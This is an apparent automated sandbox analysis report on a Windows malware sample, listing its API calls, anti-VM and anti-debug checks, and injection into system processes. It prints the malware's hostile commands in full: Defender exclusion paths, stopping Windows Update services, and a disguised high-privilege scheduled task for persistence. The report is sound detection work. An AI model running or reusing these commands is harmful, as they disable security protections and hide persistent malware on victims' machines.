                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 40000Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 64810Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 900000Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                                Source: lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                                Source: lJ4EzPSKMj.exe, 00000000.00000002.1534909567.000000000131A000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000003.1532891625.000000000131B000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1673002910.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000756000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, 28849683.exe, 0000001C.00000002.2053772305.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, 15714163.exe, 0000001D.00000002.2066012173.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, 15714163.exe, 0000001D.00000002.2066012173.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: 513318274.exe, 00000012.00000002.1796811977.0000000000B99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\0
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
                                Source: lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yz
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrAPI call chain: ExitProcess graph end nodegraph_3-4469
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_4-4501
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_17-4500
                                Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_17-4469
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91A38 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00A91A38
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91061 Sleep,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,wsprintfW,wsprintfW,PathFileExistsW,rand,wsprintfW,strlen,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00A91061
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040A890 GetProcessHeaps,3_2_0040A890
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91A38 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00A91A38
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCode function: 25_2_007E1958 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,25_2_007E1958
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeCode function: 28_2_00411C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,28_2_00411C08
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeCode function: 29_2_000118A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,29_2_000118A8
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E6981180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,38_2_00007FF6E6981180
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E6996731 SetUnhandledExceptionFilter,38_2_00007FF6E6996731
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A531C SetUnhandledExceptionFilter,38_2_00007FF6E69A531C
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Found direct / indirect Syscall (likely to bypass EDR)
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeNtQuerySystemInformation: Direct from: 0x7FF68E165B0E
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeNtQuerySystemInformation: Direct from: 0x7FF6687E5B0E
                                Maps a DLL or memory area into another process
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\dwm.exe protection: readonly
                                Modifies the context of a thread in another process (thread injection)
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 4668
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 1644
                                Writes to foreign memory regions
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\conhost.exe base: 8DE37D2010
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\dwm.exe base: CB11188010
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeProcess created: C:\Users\user\AppData\Local\Temp\5232.scr "C:\Users\user\AppData\Local\Temp\5232.scr" /SJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: GetLocaleInfoA,strcmp,3_2_0040F1B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,4_2_0040F1B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,17_2_0040F1B0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeQueries volume information: C:\Users\user\AppData\Local\Temp\513318274.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
